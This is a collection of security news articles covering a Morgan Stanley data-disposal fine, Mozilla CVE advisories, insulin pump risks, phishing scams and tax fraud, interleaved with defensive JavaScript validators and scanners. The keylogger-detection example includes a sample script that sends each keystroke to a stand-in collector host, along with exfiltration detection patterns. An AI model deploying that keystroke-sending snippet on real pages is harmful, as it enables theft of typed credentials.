IT NEWS

Morgan Stanley’s years-long “extensive failure” to protect customer data ends in huge fine

On Tuesday, the Securities and Exchange Commission (SEC) charged financial company Morgan Stanley a $35M fine for “the firm’s extensive failures, over five years, to protect the personal identifying information, or PII, of approximately 15 million customers.” The company agreed to settle the penalty.

As early as 2015, Morgan Stanley wasn’t properly disposing of devices containing sensitive customer data, according to a press release. In one instance, it hired a moving company with “no experience or expertise” in data destruction to decommission thousands of hard drives and servers holding the unencrypted data of thousands of customers. The moving company later auctioned these devices online with the data still intact.

Gurbir Grewal, the SEC’s director of the Division of Enforcement, described Morgan Stanley’s failures as “astonishing”.

“Customers entrust their personal information to financial professionals with the understanding and expectation that it will be protected, and MSSB fell woefully short in doing so,” Grewal said in a statement. “If not properly safeguarded, this sensitive information can end up in the wrong hands and have disastrous consequences for investors. Today’s action sends a clear message to financial institutions that they must take seriously their obligation to safeguard such data.”

Morgan Stanley recovered some of the resold devices, but “a vast majority” of them were never recovered.

On top of that, 42 servers from a local office and branch servers that Morgan Stanley had shut down, potentially containing thousands of unencrypted customer records, went “missing”.

Regardless of the amount of data that was “misplaced” over seven years, the company said it is not aware of any of the lost sensitive data having been exploited.

“We have previously notified applicable clients regarding these matters, which occurred several years ago, and have not detected any unauthorized access to, or misuse of, personal client information,” a spokesperson from Morgan Stanley said in a statement to CNN.

Update Firefox and Thunderbird now! Mozilla patches several high risk vulnerabilities

Mozilla has released security updates to address vulnerabilities in Firefox, Firefox ESR, and Thunderbird. An attacker could exploit some of these vulnerabilities to take control of an affected system.

In Firefox 105 a total of seven vulnerabilities were patched, three of which received the security risk rating “high”. In Thunderbird three security vulnerabilities were patched, one of which was rated “high” risk.

Security advisories were published for Firefox 105, Firefox ESR 102.3, and Thunderbird 91.13.1. Firefox 105 is the browser most Mozilla users will have on their system. Firefox Extended Support Release (ESR) is an official version of Firefox developed for large organizations that need to set up and maintain Firefox on a large scale. Thunderbird is Mozilla’s free email application.

How to update

To find out which version you are using on a Windows machine, open the application menu and click on Help > About. On a Mac, look at the top menu and click Firefox > About Firefox. This will show which version you currently have and whether an update is available. On Android use the My apps & games item in the Play Store side-menu and find Firefox Browser in the list. Use the Update button next to it.

Screenshot: Firefox downloading an available update.

The screens and the way to access them are largely the same for all Mozilla programs, including Thunderbird.

Once you’ve updated, you’re protected against these vulnerabilities.

Stay safe everyone!

The technical details

Firefox vulnerabilities

CVE-2022-40959: (High) Bypassing FeaturePolicy restrictions on transient pages. During iframe navigation, certain pages didn’t have their FeaturePolicy fully initialized leading to a bypass that leaked device permissions into untrusted subdocuments. The HTTP Feature-Policy header provides a mechanism to allow and deny the use of browser features in its own frame, and in content within any iframe elements in the document.

CVE-2022-40960: (High) Data-race when parsing non-UTF-8 URLs in threads. Concurrent use of the URL parser with non-UTF-8 data was not thread-safe. This could lead to a use-after-free causing a potentially exploitable crash. UTF-8 is an encoding system for Unicode characters. It can translate any Unicode character into a matching unique binary string. A non-UTF-8 character is a sequence of bytes that is not a valid UTF-8 character. Since UTF-8 as a character encoding was introduced in 2005, there may still be some URLs which use a different encoding, or such URLs could be deliberately constructed to exploit this vulnerability.

CVE-2022-40962: (High) Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3. These bugs were found by Mozilla developers and the Mozilla Fuzzing Team. Some of these bugs showed evidence of memory corruption and it is likely that with enough effort some of these could have been exploited to run arbitrary code.

CVE-2022-40958: (Moderate) Bypassing Secure Context restriction for cookies with __Host and __Secure prefix. By injecting a cookie with certain special characters, an attacker on a shared subdomain which is not a secure context could set and thus overwrite cookies from a secure context, leading to session fixation and other attacks. In a session fixation attack, the attacker already holds a valid session and tries to force the victim to use that particular session for the attacker’s own purposes. The attack is initiated before the victim logs in: the attacker’s session is fixed on the victim’s browser, so the victim’s subsequent login is bound to a session the attacker already controls.
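To make the protection this bug bypassed concrete, here is an added example (written for this roundup, not code from Mozilla or the advisory) of the rules the __Host- and __Secure- prefixes are meant to guarantee, implemented as a Set-Cookie validator that a server or reverse proxy could apply before a response leaves. The browser enforces these rules on its side; the same rules at the edge catch a misconfigured or injected header early. The header strings at the bottom are constructed samples.

```javascript
// Added example, not from the advisory or Mozilla's code: a Set-Cookie validator
// that enforces the guarantees the cookie prefixes are meant to carry.
//   __Secure-  must have the Secure attribute
//   __Host-    must have Secure and Path=/ and must not set Domain
// Cookie names may not contain control characters, separators (; ,) or
// whitespace; values additionally may not contain quotes or backslashes.
// "Special characters" in an injected cookie are what the bypass above
// relied on, so anything outside the allowed set is rejected outright.

const BAD_NAME_CHARS = /[\x00-\x1f\x7f;,\s=]/;
const BAD_VALUE_CHARS = /[\x00-\x1f\x7f;,\s"\\]/;

// Split one Set-Cookie header into {name, value, attrs}; attrs keys are
// lowercased, flag attributes (Secure, HttpOnly) are stored as true.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim());
  const eq = parts[0].indexOf('=');
  if (eq <= 0) return null;
  const name = parts[0].slice(0, eq);
  const value = parts[0].slice(eq + 1);
  const attrs = {};
  for (const p of parts.slice(1)) {
    if (p === '') continue;
    const i = p.indexOf('=');
    const key = (i === -1 ? p : p.slice(0, i)).trim().toLowerCase();
    attrs[key] = i === -1 ? true : p.slice(i + 1).trim();
  }
  return { name, value, attrs };
}

// Returns {ok, reason}; reason names the first rule that failed.
function checkCookiePrefix(header) {
  const c = parseSetCookie(header);
  if (!c) return { ok: false, reason: 'malformed name=value pair' };
  if (BAD_NAME_CHARS.test(c.name)) return { ok: false, reason: 'illegal character in cookie name' };
  if (BAD_VALUE_CHARS.test(c.value)) return { ok: false, reason: 'illegal character in cookie value' };
  const secure = c.attrs.secure === true;
  if (c.name.startsWith('__Secure-') && !secure) {
    return { ok: false, reason: '__Secure- cookie without Secure attribute' };
  }
  if (c.name.startsWith('__Host-')) {
    if (!secure) return { ok: false, reason: '__Host- cookie without Secure attribute' };
    if (c.attrs.path !== '/') return { ok: false, reason: '__Host- cookie must have Path=/' };
    if ('domain' in c.attrs) return { ok: false, reason: '__Host- cookie must not set Domain' };
  }
  return { ok: true, reason: '' };
}

// Constructed sample headers, as a server-side middleware might see them.
const SAMPLE_HEADERS = [
  '__Host-session=abc123; Secure; Path=/; HttpOnly; SameSite=Lax', // ok
  '__Host-session=abc123; Secure; Path=/; Domain=shop.example',    // rejected: Domain
  '__Secure-id=42; Path=/',                                        // rejected: no Secure
  '__Host-session=abc\x00123; Secure; Path=/',                     // rejected: control char
];

function checkAll(headers = SAMPLE_HEADERS) {
  return headers.map((h) => ({ header: h, ...checkCookiePrefix(h) }));
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const r of checkAll()) console.log(r.ok ? 'OK     ' : 'REJECT ', r.header, r.reason);
}
```

Only the first of the four sample headers passes. The check is deliberately strict about characters rather than trying to enumerate which ones a given browser mishandles: a cookie name or value that needs a separator, quote or control byte has no legitimate reason to exist.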

CVE-2022-40961: (Moderate) Stack-buffer overflow when initializing Graphics. During startup, a graphics driver with an unexpected name could lead to a stack-buffer overflow causing a potentially exploitable crash. This issue only affects Firefox for Android. Other operating systems are not affected.

CVE-2022-40956: (Low) Content-Security-Policy (CSP) base-uri bypass. When injecting an HTML base element, some requests would ignore the CSP’s base-uri settings and accept the injected element’s base instead. The HTTP CSP base-uri directive restricts the URLs which can be used in a document’s <base> element.
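To show what the base-uri directive restricts, here is an added example (not Mozilla’s CSP implementation) of a small matcher that decides whether a given <base href> is permitted by a page’s Content-Security-Policy. It assumes the policy arrives as a single header string and handles the source expressions most policies use: 'none', 'self', a bare scheme such as https:, and host sources with an optional *. wildcard and port. The policy and URLs at the bottom are constructed.

```javascript
// Added example, not Mozilla's CSP code: decides whether a <base href> is
// permitted by a page's Content-Security-Policy base-uri directive.

// Parse "directive src src; directive src" into a Map of directive -> sources.
// CSP ignores all but the first occurrence of a directive, so do the same.
function parseCsp(header) {
  const directives = new Map();
  for (const raw of header.split(';')) {
    const tokens = raw.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!directives.has(name)) directives.set(name, tokens.slice(1));
  }
  return directives;
}

function defaultPort(protocol) {
  return protocol === 'https:' ? '443' : protocol === 'http:' ? '80' : '';
}

// "*.example.com" matches any subdomain but not example.com itself.
function hostMatches(pattern, host) {
  if (pattern.startsWith('*.')) {
    const suffix = pattern.slice(1);
    return host.endsWith(suffix) && host.length > suffix.length;
  }
  return pattern === host;
}

// One CSP source expression against a resolved URL object.
function sourceMatches(source, url, docOrigin) {
  const s = source.toLowerCase();
  if (s === "'self'") return url.origin === docOrigin;
  if (s === '*') return true;
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return url.protocol === s;           // scheme-source, e.g. https:
  const m = s.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?([^/:]+)(?::(\d+|\*))?/); // host-source
  if (!m) return false;
  const [, scheme, host, port] = m;
  if (scheme && url.protocol !== scheme + ':') return false;
  if (!hostMatches(host, url.hostname)) return false;
  if (port && port !== '*' && port !== (url.port || defaultPort(url.protocol))) return false;
  return true; // a path component in the source expression is ignored here
}

// True if the document at documentUrl, served with cspHeader, may use baseHref.
function baseUriAllowed(cspHeader, baseHref, documentUrl) {
  const sources = parseCsp(cspHeader).get('base-uri');
  if (!sources) return true; // base-uri has no fallback to default-src: absent means unrestricted
  if (sources.length === 1 && sources[0].toLowerCase() === "'none'") return false;
  const doc = new URL(documentUrl);
  const base = new URL(baseHref, documentUrl); // relative hrefs resolve against the document, as in a browser
  return sources.some((src) => sourceMatches(src, base, doc.origin));
}

// Constructed policy and document for a quick run.
const POLICY = "default-src 'self'; base-uri 'self' https://cdn.example";
const DOCUMENT = 'https://shop.example/checkout';

function demo() {
  return {
    injectedRemoteBase: baseUriAllowed(POLICY, 'https://attacker.example/', DOCUMENT), // false
    relativeBase: baseUriAllowed(POLICY, '/static/', DOCUMENT),                      // true
    noDirective: baseUriAllowed("default-src 'none'", 'https://attacker.example/', DOCUMENT), // true
  };
}
```

The third line of demo() is the one worth remembering: a policy that only sets default-src leaves base-uri completely unrestricted, because base-uri is one of the directives that does not inherit from default-src. A page that relies on CSP to contain an injected <base> element has to say so explicitly.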

CVE-2022-40957: (Low) Incoherent instruction cache when building WASM on ARM64. Inconsistent data in instruction and data cache when creating wasm code could lead to a potentially exploitable crash. Wasm is designed as a portable compilation target for programming languages, enabling deployment on the web for client and server applications. This bug only affects Firefox on ARM64 platforms. ARM64 is the architecture used by newer Macs built on Apple Silicon, shipped in late 2020 and beyond.

Thunderbird

CVE-2022-3033: (High) Leaking of sensitive information when composing a response to an HTML email with a META refresh tag. If a Thunderbird user replied to a crafted HTML email containing a meta tag, with the meta tag having the http-equiv="refresh" attribute, and the content attribute specifying a URL, then Thunderbird started a network request to that URL, regardless of the configuration to block remote content. In combination with certain other HTML elements and attributes in the email, it was possible to execute JavaScript code included in the message in the context of the message compose document. This bug doesn’t affect Thunderbird users who have changed the default Message Body display setting to ‘simple html’ or ‘plain text’.

CVE-2022-3032: (Moderate) When receiving an HTML email that contained an iframe element, which used a srcdoc attribute to define the inner HTML document, remote objects specified in the nested document, for example images or videos, were not blocked. Rather, the network was accessed, the objects were loaded and displayed.

CVE-2022-3034: (Moderate) An iframe element in an HTML email could trigger a network request. When receiving an HTML email that specified to load an iframe element from a remote location, a request to the remote document was sent. However, Thunderbird didn’t display the document.
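All three Thunderbird issues concern HTML constructs that cause a network request before the user has chosen to load remote content. The following added example (not Thunderbird’s code) is a small scanner that reports such triggers in a message body: a meta refresh carrying a URL, an iframe with a remote src, and remote images or media inside an iframe’s srcdoc document. The sample message is constructed, with a .invalid host standing in for a tracker. It is regex-based so it runs without a DOM; a production filter would apply the same rules from a real HTML parser.

```javascript
// Added example, not Thunderbird code: report HTML constructs in a message
// body that can trigger a network request even when remote content is blocked.

// Tokenize the attributes of one start tag into a lowercase-keyed object.
// Attributes are consumed left to right, so a srcdoc value that itself
// contains "src=" text is never mistaken for the iframe's own src.
function tagAttributes(tag) {
  const body = tag.replace(/^<[a-zA-Z][^\s/>]*/, '').replace(/\/?>$/, '');
  const re = /([^\s=/>"']+)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/g;
  const out = {};
  let m;
  while ((m = re.exec(body)) !== null) {
    out[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? '';
  }
  return out;
}

// Minimal entity decoding, enough to read the document inside a srcdoc attribute.
function decodeEntities(s) {
  return s.replace(/&quot;/g, '"').replace(/&#39;/g, "'").replace(/&lt;/g, '<')
          .replace(/&gt;/g, '>').replace(/&amp;/g, '&');
}

// Only network URLs count; cid: (inline attachments) and data: never leave the client.
function isRemote(url) {
  return /^\s*(?:https?:)?\/\//i.test(url) || /^\s*ftp:/i.test(url);
}

function findRemoteTriggers(html) {
  const findings = [];
  // 1. <meta http-equiv="refresh" content="0; url=https://..."> (CVE-2022-3033)
  for (const tag of html.match(/<meta\b[^>]*>/gi) || []) {
    const a = tagAttributes(tag);
    if ((a['http-equiv'] || '').toLowerCase() !== 'refresh') continue;
    const m = (a.content || '').match(/url\s*=\s*['"]?([^'"\s;]+)/i);
    if (m) findings.push({ kind: 'meta-refresh', url: m[1] });
  }
  for (const tag of html.match(/<iframe\b[^>]*>/gi) || []) {
    const a = tagAttributes(tag);
    // 2. <iframe src="https://..."> fetches the document even if never shown (CVE-2022-3034)
    if (a.src && isRemote(a.src)) findings.push({ kind: 'iframe-src', url: a.src });
    // 3. remote objects inside the nested document of <iframe srcdoc="..."> (CVE-2022-3032)
    if (a.srcdoc) {
      const inner = decodeEntities(a.srcdoc);
      for (const t of inner.match(/<(?:img|video|audio|source|script)\b[^>]*>/gi) || []) {
        const src = tagAttributes(t).src;
        if (src && isRemote(src)) findings.push({ kind: 'srcdoc-remote-object', url: src });
      }
    }
  }
  return findings;
}

// Constructed sample message; tracker.invalid stands in for a remote host.
const SAMPLE_MESSAGE = `<html><body>
<meta http-equiv="refresh" content="0; url=https://tracker.invalid/open?id=42">
<p>Hello,</p>
<iframe src="https://tracker.invalid/frame.html"></iframe>
<iframe srcdoc="&lt;img src=&quot;https://tracker.invalid/pixel.gif&quot;&gt;"></iframe>
<img src="cid:logo@local">
</body></html>`;

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of findRemoteTriggers(SAMPLE_MESSAGE)) console.log(f.kind, f.url);
}
```

On the sample message the scanner reports three triggers and ignores the cid: image, which is an inline attachment rather than a network fetch. Any finding is a reason to strip the element or to keep the message in plain-text view, the same mitigation the advisory names for CVE-2022-3033.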

Medtronic’s MiniMed 600 series insulin pumps potentially at risk of compromise, says FDA

The US FDA (Food and Drug Administration) has warned users of Medtronic’s MiniMed 600 Series Insulin Pump System—specifically, models for MiniMed 630G and MiniMed 670G—that their medical devices have a cybersecurity issue in their communication protocol. If compromised, attackers could gain unauthorized access to the pump system itself, and alter it to deliver too much or too little insulin to the patient.

Because the MiniMed 600 series devices have components (the insulin pump, the blood glucose meter, the continuous glucose monitoring transmitter, and the CareLink USB device) that communicate wirelessly, nearby attackers could gain unauthorized access to them when the pump is paired with these components. Medtronic clearly stated that such an attack could not be done over the internet.

“Medtronic has no evidence to date that such an issue has occurred,” the company’s Urgent Medical Device Correction notification page states. “However, in the unlikely event that unauthorized access would be successful, the access could be used to deliver too much or too little insulin through delivery of an unintended insulin bolus or because insulin delivery is slowed or stopped. Too much insulin could result in hypoglycemia (low blood sugar) which can potentially lead to seizure, coma or death. Too little insulin could result in hyperglycemia (high blood sugar) which can potentially lead to diabetic ketoacidosis.”

The FDA continues to work with Medtronic to identify, communicate, and prevent the effects of the devices’ vulnerability. Medtronic advises taking action and the necessary precautions to avoid being at risk. First, the company advises users to turn off the “Remote Bolus” feature of the pump, which is on by default.

The company also reminded users to keep their insulin pump and its components within their control at all times, never confirm connection requests on the pump screen unless initiated by them or their care partner, and not share their insulin pump’s or device’s serial numbers with anyone but their healthcare provider, distributor, and Medtronic. A detailed list of precautions can be found on this page.

Scammers send fake ‘Energy Bills Support Scheme’ texts

Watch out for an energy-themed scam being sent out via SMS. The message plays on energy price fears, similar to what we’ve seen previously.

It reads as follows:

GOVUK: We have identified you as eligible for a discounted energy bill under the Energy Bills Support Scheme. You can apply here [URL]

The message, which claims to be from the UK government, directs clickers to a phishing page which resembles a typical gov.uk website.

Energy Bills Support Scheme

Register now to receive a £400 non-repayable discount under the Energy Bills Support Scheme.

Anyone “registering” to the website may well find themselves out of pocket. Considering those most likely to respond to such a message may be people already struggling financially, this is a particularly despicable attack.

Phishing for info

The pattern followed by this site is typical of this kind of attack. First it asks potential victims to enter a variety of personal information:

  • Name
  • Date of birth
  • Phone number
  • Address
  • City
  • Postcode

Once this is done, the site asks for your current energy supplier, and provides a list of pre-fills.

The site eventually asks for:

  • Card number
  • Card expiry date
  • Card security code

It also places the logo of whichever company you’ve selected at the top of the page, along with the following message:

This should be the account linked to your [business name] account. This is the account your supplier will send the payments to.

It’s worth noting that the URL is already being flagged by some browsers. For example, Chrome will make you confirm that you want to visit the site, ignoring its prominent “this site is bogus” warning. If you actually visit the page despite this, it’s also tagged as “Dangerous” where the green padlock in the URL bar is located. Users of Malwarebytes are protected from the phishing URL used in this attack.

How to avoid energy scams

  • Phone calls, emails, and random SMS messages asking for payment information are not going to be legitimate. You should also never be asked for login details for your online banking or other accounts from a cold-caller.
  • If you receive an unexpected call about energy prices or rebates, insist on calling “them” back on their official number taken from an official website directly. If the caller objects to this, that’s an immediate red flag. A genuine caller would have no possible reason to object to this.
  • Bogus energy company websites are very popular and easy to set up. Visit the official website listed in official correspondence only, and pay close attention to URLs sent to you by text or email. Don’t trust sites sent your way in relation to any money back, discount, or rebate offer.

Stay safe out there!

5 things to teach your kids about social media

With children now back at school, it’s time to think about social media, and their use of it.

Are they already firing out tweets, chatting in Discord channels, or even just looking to set up a Tik-Tok account? Now is the time to consider giving your kids some security and privacy tips for all their social media needs.

1. Get to grips with default settings

Most sites are in the business of making your data their business. EULAs and privacy policies are frequently terribly confusing for grown-ups. Expecting a child to make sense of 1,000 very legal words is unfeasible. Social networks are absolutely in the business of providing services for free, and then using analytics to drive advertising on their sites.

Often, privacy settings are defaulted in a way which makes it easier for marketing/advertising/data-gulping to take place. Some examples:

  • Allow third party/relevant advertising tailored to your interests

  • GPS location set to on (usually ties into the targeted advertising point above)

  • Find your friends (in other words, import your address book and make connections between email addresses and social media profiles)

These are things which may sound helpful, and no doubt are to some, but everybody using an app does not need any or all of these enabled by default. With this in mind, here’s what to tell your kid about default settings:

Look out for anything mentioning offers, location, advertising, relevant content, and finding friends. All of these options and settings help the site you’re using to operate, but they’re not necessarily going to be helpful for you too. Before you start posting, ensure options like location in particular are disabled unless you have a very good reason for needing it.

2. It’s all about location

We touched on this briefly above, but this is a key component of your “Please watch out for these things” conversation. Trolling. Doxxing (grabbing personal details in a way which identifies an individual and then publishing them online). Swatting (sending fake emergency calls to law enforcement which results in armed officers crashing through your door). All of these things are very bad, and you don’t want your child getting tangled up in any of it.

Sadly, location services on social networks can cause problems in this area. Sometimes location is kept private for the user only. Other times, the location is in full view. It may be somewhat generic and say a major city like London, or it may drill down to a street.

Even without tech-related issues or troublesome settings, the real world can also give details away. Thanks to open-source tools, reverse image searches, and crowd-sourced data, it’s never been easier to give the locational game away:

  • A letter in a photograph with your address on it
  • Unique identifiers (views outside a window, for example)
  • Regional dialects or other specific references in the background of video footage

Almost anything can provide somebody with the clue to get an idea of where your child may be living. Here’s what to tell your child:

Pay close attention to the world around you if you’re a fan of streaming, Tik-Tok, or selfies. Keep your home, identifiable locations, and anything with your name and address on it out of shot. Even grown-ups make these mistakes, so it’s very easy to accidentally do it yourself. Oh, and if you’re going on holiday you may wish to reference it only once you’ve returned home. Tales of empty houses being broadcast to the world at large on social media may not end well.

3. The value of anonymity

Back in the olden days, most of us were online using a pseudonym. It wasn’t massively common to have your real name or other potentially unique identifiers following you around from site to site. In fact, for the first few years of my security career, writers and journalists referred to me as my online handle because they didn’t actually know my name.

This is a far cry from what we currently have, with real names everywhere, verified profiles, authentication, and the common refrain that only people with something to hide don’t use their real name.

The reality is, people don’t use their real name online for all sorts of valid reasons. There might be domestic abuse or harassment issues. They may live somewhere where free speech or being critical of their government is frowned upon.

However, it’s important to note that you don’t have to be in one of the above awful scenarios to insist on anonymity of one form or another. Indeed, going down the anonymous route from the get-go may help ward off potentially unpleasant situations at a future date anyway.

Most sites will allow you to use whatever visible username you like. A few insist on real names, but it’s unlikely your kids are currently hanging out on Facebook. While you’re usually asked to put a real name alongside your online handle, it’s not mandatory and there’s a good chance nobody will ever check what you put there. Nor are the platforms likely to suddenly lock an account and demand additional verification of some kind at a later date. Here’s what you should tell your children about this issue:

There’s nothing wrong with being anonymous on social media, and unless the site explicitly asks for a real name and additional information you shouldn’t feel pressured into handing it over. Keeping yourself anonymous also helps to ward off some of the issues related to location oversharing. Pick the level of generic anonymity that you’re comfortable with.

4. Watch out for the fakers

Social media is rife with scams, and scammers will happily target anyone in front of them. In fact, some will actively target children specifically because of their likely inexperience in spotting a fake-out. Kids are also unlikely to use additional security measures like two-factor authentication. This means less work for the attacker. Fortunately you can help with this.

Any platform you can think of has scams particularly suited to it. Instagram is awash with Bitcoin scams and bogus competitions. Twitter has lots of phishing, NFT scams, bogus video game downloads, and get rich quick schemes. Facebook sees a fair amount of fake PlayStation sales and more generic Messenger scams. Compromised verified accounts, which add legitimacy to fraud, are common across all platforms.

What you should tell your kids:

Every site has its own groups of scammers, each with their own preferred method of attack. Spend a few minutes reading the site’s security pages to ensure you keep your account safe from harm. If an offer or deal sounds too good to be true, it probably is. Very few social media giveaways are genuine.

If you receive direct messages from strangers, or you’ve been notified that you violated a website policy and need to re-verify your identity, come and tell us and we’ll take a look for you. Never, ever grant someone access to your account…even if they claim to be employees for the site. This is never going to be a genuine request from a member of staff and you may lose your account.

5. Be honest and respect privacy

Many times, young children and teens don’t want the hassle of locking everything down and micromanaging passwords or security settings. They may already have email addresses and various social media accounts. Are those email addresses locked down? Using two-factor authentication? Do your kids know their way around the various security settings across all of their logins? How about password managers?

In these cases, parents often offer to help. Where younger children are concerned, I know some parents who use one of their pre-locked down email addresses to tie social media accounts to. Most of the time, you don’t really need to do much with whatever address you link to Twitter or Tik-Tok or anywhere else, you just need it to tie your username to. As a result, hooking the accounts to a secure email managed by parents can be a quick and easy win for everybody.

Of course, there are privacy issues here to consider. The older the child, the more likely they may be to send other social media users direct messages. Parents should be open about this; some platforms send a digest of all private messages to the connected email account. You can turn this feature on and off in Twitter, for example, but every site is different. You should see how your child feels about this. Some may not care, but others most definitely will. What to tell them:

I’m happy to micromanage the security practices behind the scenes. The trade-off is that some, or all, of what you do may be sent back to me through the email used to register the account. We can check how the site in question works in relation to this, and set it in a way you’d be comfortable with. Remember that sites often change existing features or add new ones, and we may have to adjust as we go.

Closing out the Summer

It’s not easy getting kids ready to go back to school. It’s even trickier to ensure they keep themselves safe from harm online. We hope the advice above will be helpful to you in getting one of those two gargantuan tasks off the table. Stay safe out there!

Vulnerable children’s identities used in tax fraud scheme

The United States Attorney for the Southern District of New York has announced that Ariel “Melo” Jimenez (38) was sentenced to 12 years in prison for leading a “tax fraud and identity theft conspiracy” that resulted in the fraudulent claiming of tax credits, earning him millions of dollars.

“Ariel Jimenez was the leader of a long-running fraudulent tax business that cheated the Government of tax refunds by stealing the identities of vulnerable children and using those identities to falsely claim tax credits on behalf of his clients,” said US Attorney Damian Williams in a press release. “Today’s sentence holds Jimenez accountable for brazenly selling the identities of children to his customers for his own profit.”

Jimenez was arrested with eight of his co-conspirators: Evelin Jimenez and Ana Yessenia Jimenez, his sisters; Ireline Nunez, Leyvi Castillo, Cinthia Federo, Guillermo Arias Moncion, Marcos “Junior” De Jesus Pantaleon, and Jose “Jairo” Castillo. The unsealed complaint mentioned a “corrupt New York City employee” and a “cooperating witness” (CW-1), but it didn’t name them.

Modus operandi

According to the complaint, Jimenez conspired with a fraud investigator (known as “CW-1”) within the New York City Human Resources Administration (HRA) when he established his tax fraud business in 2007 in the Bronx. The NYC HRA is a government organization tasked with providing food and emergency rental assistance for those in need.

CW-1 admitted to stealing children’s data, which comprised their names, dates of birth, and SSNs (Social Security Numbers), from the Welfare Management System and selling these to Jimenez. Jimenez would then list these children as dependents on tax returns Jimenez prepared for his clients. Jimenez and his team are said to have callously referred to these children’s identities as “pollitos” (“little chickens” or “chicks” in Spanish).

Jimenez would charge his clients between $1,000 and $1,500 per child he’d fraudulently add to their tax returns. These children were included as false dependents so the taxpayers (Jimenez’s clients) could file for inflated tax refunds.

“Jimenez’s use of stolen identities harmed the actual caretakers of the children who were fraudulently claimed as dependents,” the press release states. “In some cases, the people actually taking care of these children had much-needed tax refunds delayed and were required to prove their actual connection to their own dependent children.”

A lavish lifestyle

Since setting up his business in 2007, Jimenez has amassed millions of dollars, which he used to purchase real estate and fund a lavish lifestyle. He admitted to spending a total of $5.5M on properties in the US and abroad, jewelry, cars, and gambling. He transferred several properties to his parents to hide his source of funds.

On top of a 12-year sentence, Jimenez was ordered to give up three of his properties and pay forfeiture amounting to $14.580M. He was also ordered to pay restitution for $44,769,906.

Tax refund phish logs keystrokes to swipe personal details

There have been some smart phishing campaigns running over the last few weeks, and this one is particularly sneaky. Bleeping Computer reports that a phishing page is targeting Greek taxpayers with a tax refund scam. The added sting in the tail comes in the form of an embedded keylogger which grabs everything entered onto the page.

An untimely tax refund

The phishing mails rely on that time-honoured tradition of bogus tax returns and non-existent refunds. The landing page, which mimics an official gov.gr portal, reads as follows:

The Hellenic Tax Office has calculated your tax return, you are entitled to a tax refund of €634.13 (around $633 USD). We have tried to transfer the amount to your account. Unfortunately we were unable to confirm your current account number.

What follows is a drop-down form where the victim can select their bank and “log into the portal”. According to researchers at Cyble, there are several URLs being used to phish victims and they all do a decent job of imitating the real deal. Multiple major banks are listed in the drop-down menu, and the bogus bank pages closely resemble the real thing. Unfortunately for site visitors, this is where the previously mentioned sting in the tail comes into play.

A sneaky way to grab data

Phishing sites typically rely on the visitor hitting the submit button to send their personal information into the hands of the scammers. If someone realises something isn’t quite right at the last minute and abandons ship, the scammers are left with nothing.

In this case, the site has an embedded JavaScript keylogger ticking away in the background. What this means is that anything entered into the various entry boxes is grabbed via the keylogger and immediately sent to the fraudsters. In this scenario, realising something is wrong may not save the victim. Anything they punched into the site up to that point will already be waiting for the phisher to retrieve at their leisure. Sure, they may have only entered information which won’t help attackers, but smart scammers using this technique will likely front-load entry forms with the important details first.
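Whether a page sends typed data before the submit button is pressed is something that can be checked statically from a saved copy of the page. The following added example (written for this article, not from the Bleeping Computer or Cyble research) is a triage heuristic that extracts inline scripts and flags an event handler only when it listens for keystrokes or typed input and, inside that same handler, calls something that can send data off the page. A handler that sends data on submit is how every login form works and is left alone. The sample page and the collector.invalid host are constructed, and the scanner follows only inline handlers, not named functions registered by reference.

```javascript
// Added example, not from the reports on this campaign: a static triage
// heuristic for a saved copy of a suspected phishing page. A script is
// flagged when a handler for keystrokes or typed input contains, within
// that same handler, a call that can send data off the page.

const INPUT_EVENT = /addEventListener\s*\(\s*['"](?:key(?:down|up|press)|input|change)['"]\s*,/g;
const EXFIL = /\bfetch\s*\(|XMLHttpRequest|sendBeacon\s*\(|new\s+Image\s*\(|WebSocket\s*\(/;

// Text of the addEventListener(...) call starting at `start`, found by
// walking to the parenthesis that closes it. Parentheses inside string
// literals are not tracked; good enough for triage, not a parser.
function callText(source, start) {
  let depth = 0;
  for (let i = source.indexOf('(', start); i >= 0 && i < source.length; i++) {
    if (source[i] === '(') depth++;
    else if (source[i] === ')' && --depth === 0) return source.slice(start, i + 1);
  }
  return source.slice(start);
}

// Returns the input events whose inline handler can send data, e.g. ['keyup'].
// Handlers registered by name (addEventListener('keyup', logKey)) are not
// followed into their definition.
function analyseScript(source) {
  const events = [];
  const re = new RegExp(INPUT_EVENT.source, 'g');
  let m;
  while ((m = re.exec(source)) !== null) {
    const call = callText(source, m.index);
    if (EXFIL.test(call)) events.push(call.match(/['"](\w+)['"]/)[1]);
  }
  return { events, suspicious: events.length > 0 };
}

// Scan every inline <script> in a page; returns the flagged ones with their index.
function findSuspiciousScripts(html) {
  const flagged = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  let index = 0;
  while ((m = re.exec(html)) !== null) {
    const result = analyseScript(m[1]);
    if (result.suspicious) flagged.push({ index, ...result });
    index++;
  }
  return flagged;
}

// Constructed sample: script 0 is an ordinary form (validate while typing,
// send on submit); script 1 sends every keystroke, the pattern described above.
const SAMPLE_PAGE = `
<form id="login"><input name="user"><input name="pass" type="password"></form>
<script>
  const form = document.getElementById('login');
  form.addEventListener('input', () => form.classList.add('dirty'));
  form.addEventListener('submit', (e) => {
    e.preventDefault();
    fetch('/api/login', { method: 'POST', body: new FormData(form) });
  });
</script>
<script>
  document.addEventListener('keyup', (e) => fetch('https://collector.invalid/k', { method: 'POST', body: e.key }));
</script>`;

if (typeof require !== 'undefined' && require.main === module) {
  console.log(findSuspiciousScripts(SAMPLE_PAGE)); // flags script 1 for 'keyup'
}
```

The distinction the heuristic draws is the one that matters for the risk assessment in the list below: a form that only talks to the network on submit leaves someone who abandons the page with nothing to clean up, while a keystroke-driven sender means everything typed so far should be treated as exposed. Obfuscated or externally loaded scripts will slip past a regex; for those, watching the browser’s network panel while typing into a test field tells the same story.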

What can you do?

Tools used to block third-party trackers reportedly aren’t effective against this kind of embed. With that being the case:

  • Tax refunds are rather rare for most people, so question the authenticity of such a claim should you receive one. Contact your local tax authority directly. Many host an up-to-date list of common and current tax scams, which may help to answer your question before you’ve even picked up the phone.

